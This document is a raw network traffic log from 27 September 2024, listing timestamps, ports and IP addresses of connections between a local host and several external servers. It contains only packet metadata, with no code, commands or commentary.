Sep 27, 2024 00:29:28.556813955 CEST	57921	80	192.168.2.6	172.67.74.152
Sep 27, 2024 00:29:28.564265966 CEST	80	57921	172.67.74.152	192.168.2.6
Sep 27, 2024 00:29:29.024585009 CEST	80	57921	172.67.74.152	192.168.2.6
Sep 27, 2024 00:29:29.058070898 CEST	57922	3389	192.168.2.6	8.46.123.33
Sep 27, 2024 00:29:29.065762043 CEST	3389	57922	8.46.123.33	192.168.2.6
Sep 27, 2024 00:29:29.065825939 CEST	57922	3389	192.168.2.6	8.46.123.33
Sep 27, 2024 00:29:29.066190004 CEST	57922	3389	192.168.2.6	8.46.123.33
Sep 27, 2024 00:29:29.073601961 CEST	3389	57922	8.46.123.33	192.168.2.6
Sep 27, 2024 00:29:29.073645115 CEST	57922	3389	192.168.2.6	8.46.123.33
Sep 27, 2024 00:29:29.234724998 CEST	80	57921	172.67.74.152	192.168.2.6
Sep 27, 2024 00:29:29.234786987 CEST	57921	80	192.168.2.6	172.67.74.152
Sep 27, 2024 00:29:29.935973883 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:29.936197996 CEST	57915	80	192.168.2.6	45.132.206.251
Sep 27, 2024 00:29:34.246061087 CEST	57921	80	192.168.2.6	172.67.74.152
Sep 27, 2024 00:29:34.253304958 CEST	80	57921	172.67.74.152	192.168.2.6
Sep 27, 2024 00:29:34.358185053 CEST	80	57921	172.67.74.152	192.168.2.6
Sep 27, 2024 00:29:34.407536030 CEST	57921	80	192.168.2.6	172.67.74.152
Sep 27, 2024 00:29:34.425352097 CEST	57923	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:34.425386906 CEST	443	57923	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:34.425740004 CEST	57923	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:34.551486969 CEST	57923	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:34.551523924 CEST	443	57923	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:35.038008928 CEST	443	57923	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:35.038090944 CEST	57923	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:35.040290117 CEST	57923	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:35.040302038 CEST	443	57923	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:35.040599108 CEST	443	57923	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:35.095019102 CEST	57923	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:35.134475946 CEST	57923	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:35.179404020 CEST	443	57923	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:35.234900951 CEST	443	57923	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:35.235294104 CEST	57923	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:35.235322952 CEST	443	57923	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:35.598789930 CEST	443	57923	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:35.598871946 CEST	443	57923	188.114.97.3	192.168.2.6
Sep 27, 2024 00:29:35.598982096 CEST	57923	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:35.643378973 CEST	57923	443	192.168.2.6	188.114.97.3
Sep 27, 2024 00:29:35.662795067 CEST	57921	80	192.168.2.6	172.67.74.152
Sep 27, 2024 00:29:35.663311958 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:45.098079920 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:45.098119020 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:45.098289013 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:45.101870060 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:45.101890087 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:45.752096891 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:45.752186060 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:45.812724113 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:45.812747955 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:45.813087940 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:45.813144922 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:45.815068007 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:45.855407953 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:46.231569052 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:46.231594086 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:46.231647015 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:46.231751919 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:46.231770039 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:46.231797934 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:46.231820107 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:46.333992958 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:46.334022999 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:46.334105015 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:46.334115028 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:46.334144115 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:46.339145899 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:46.339236021 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:46.339242935 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:46.339256048 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:46.339306116 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:46.339720964 CEST	57925	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:29:46.339730978 CEST	443	57925	104.102.49.254	192.168.2.6
Sep 27, 2024 00:29:46.354424000 CEST	57926	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:46.354465008 CEST	443	57926	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:46.354553938 CEST	57926	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:46.354844093 CEST	57926	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:46.354860067 CEST	443	57926	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:47.020347118 CEST	443	57926	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:47.020497084 CEST	57926	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:47.024048090 CEST	57926	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:47.024055958 CEST	443	57926	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:47.024365902 CEST	443	57926	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:47.024440050 CEST	57926	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:47.024853945 CEST	57926	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:47.067403078 CEST	443	57926	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:47.669727087 CEST	443	57926	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:47.669842005 CEST	443	57926	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:47.669842958 CEST	57926	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:47.669898987 CEST	57926	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:47.671071053 CEST	57926	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:47.671113014 CEST	443	57926	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:47.674084902 CEST	57927	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:47.674127102 CEST	443	57927	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:47.674218893 CEST	57927	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:47.674539089 CEST	57927	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:47.674551964 CEST	443	57927	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:48.371829987 CEST	443	57927	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:48.372023106 CEST	57927	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:48.372509956 CEST	57927	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:48.372517109 CEST	443	57927	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:48.374373913 CEST	57927	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:48.374378920 CEST	443	57927	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:49.131047964 CEST	443	57927	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:49.131158113 CEST	57927	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:49.131175041 CEST	443	57927	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:49.131238937 CEST	443	57927	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:49.131241083 CEST	57927	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:49.131294966 CEST	57927	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:49.131347895 CEST	57927	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:49.131373882 CEST	443	57927	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:49.133167982 CEST	57928	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:49.133223057 CEST	443	57928	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:49.133382082 CEST	57928	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:49.133618116 CEST	57928	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:49.133642912 CEST	443	57928	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:49.792437077 CEST	443	57928	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:49.792506933 CEST	57928	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:49.793106079 CEST	57928	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:49.793118954 CEST	443	57928	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:49.795036077 CEST	57928	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:49.795042992 CEST	443	57928	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:50.497349977 CEST	443	57928	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:50.497406960 CEST	443	57928	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:50.497555017 CEST	443	57928	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:50.497594118 CEST	57928	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:50.497594118 CEST	57928	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:50.497725010 CEST	57928	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:50.498002052 CEST	57928	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:50.498023987 CEST	443	57928	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:50.499943972 CEST	57929	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:50.499979973 CEST	443	57929	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:50.500070095 CEST	57929	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:50.500292063 CEST	57929	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:50.500305891 CEST	443	57929	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:51.385603905 CEST	443	57929	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:51.385668039 CEST	57929	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:51.386203051 CEST	57929	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:51.386213064 CEST	443	57929	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:51.388101101 CEST	57929	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:51.388118029 CEST	443	57929	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:52.096302986 CEST	443	57929	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:52.096365929 CEST	443	57929	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:52.096417904 CEST	57929	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:52.096431017 CEST	443	57929	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:52.096455097 CEST	57929	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:52.096498966 CEST	57929	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:52.096529007 CEST	443	57929	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:52.096611023 CEST	57929	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:52.096836090 CEST	57929	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:52.096853018 CEST	443	57929	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:52.098539114 CEST	57930	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:52.098567009 CEST	443	57930	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:52.098654985 CEST	57930	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:52.098855019 CEST	57930	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:52.098867893 CEST	443	57930	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:52.772983074 CEST	443	57930	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:52.773148060 CEST	57930	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:52.773745060 CEST	57930	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:52.773752928 CEST	443	57930	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:52.775620937 CEST	57930	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:52.775625944 CEST	443	57930	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:53.477032900 CEST	443	57930	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:53.477127075 CEST	443	57930	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:53.477155924 CEST	57930	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:53.477220058 CEST	57930	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:53.479644060 CEST	57930	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:53.479657888 CEST	443	57930	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:54.119641066 CEST	57931	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:54.119682074 CEST	443	57931	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:54.119755983 CEST	57931	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:54.120004892 CEST	57931	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:54.120016098 CEST	443	57931	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:54.774945021 CEST	443	57931	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:54.775042057 CEST	57931	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:54.775690079 CEST	57931	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:54.775698900 CEST	443	57931	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:54.777507067 CEST	57931	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:54.777512074 CEST	443	57931	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:54.777579069 CEST	57931	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:54.777586937 CEST	443	57931	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:55.111602068 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:55.111643076 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:55.111758947 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:55.112057924 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:55.112086058 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:55.572006941 CEST	443	57931	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:55.572102070 CEST	443	57931	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:55.572218895 CEST	57931	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:55.572218895 CEST	57931	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:55.573486090 CEST	57931	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:55.573498011 CEST	443	57931	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.087582111 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.087727070 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.088336945 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.088365078 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.090276003 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.090289116 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.537552118 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.537580013 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.537600040 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.537631989 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.537686110 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.537707090 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.537782907 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.559822083 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.559853077 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.559989929 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.560020924 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.560168982 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.635351896 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.635391951 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.635477066 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.635524035 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.635562897 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.635586023 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.664478064 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.664503098 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.664633989 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.664649963 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.664693117 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.698995113 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.699026108 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.699183941 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.699198961 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.699254036 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.729140997 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.729166031 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.729326010 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.729337931 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.729382992 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.750479937 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.750502110 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.750638008 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.750650883 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.750694990 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.769678116 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.769701004 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.769768000 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.769778967 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.770019054 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.788753986 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.788778067 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.788944960 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.788957119 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.789001942 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.804727077 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.804750919 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.804898024 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.804912090 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.804955959 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.821486950 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.821517944 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.821631908 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.821641922 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.821682930 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.835094929 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.835117102 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.835254908 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.835278988 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.835335970 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.850122929 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.850146055 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.850274086 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.850300074 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.850364923 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.860944986 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.860986948 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.861098051 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.861121893 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.861176968 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.869390011 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.869409084 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.869518042 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.869539022 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.869589090 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.878999949 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.879020929 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.879076958 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.879090071 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.879134893 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.887943029 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.887973070 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.888041973 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.888060093 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.888088942 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.888108015 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.898787975 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.898808002 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.898925066 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.898937941 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.898978949 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.908662081 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.908688068 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.908787012 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.908796072 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.908832073 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.929358006 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.929380894 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.929497957 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.929522038 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.929582119 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.938357115 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.938378096 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.938441038 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.938462019 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.938508034 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.950051069 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.950078011 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.950177908 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.950198889 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.950248003 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.959135056 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.959162951 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.959211111 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.959230900 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.959269047 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.959290981 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.968571901 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.968596935 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.968691111 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.968699932 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.968736887 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.976634026 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.976660013 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.976751089 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.976766109 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.976809025 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.990603924 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.990631104 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.990721941 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.990740061 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.990792990 CEST	57932	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:56.995193005 CEST	443	57932	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:56.995219946 CEST	443	57932	5.75.211.162	192.168.2.6
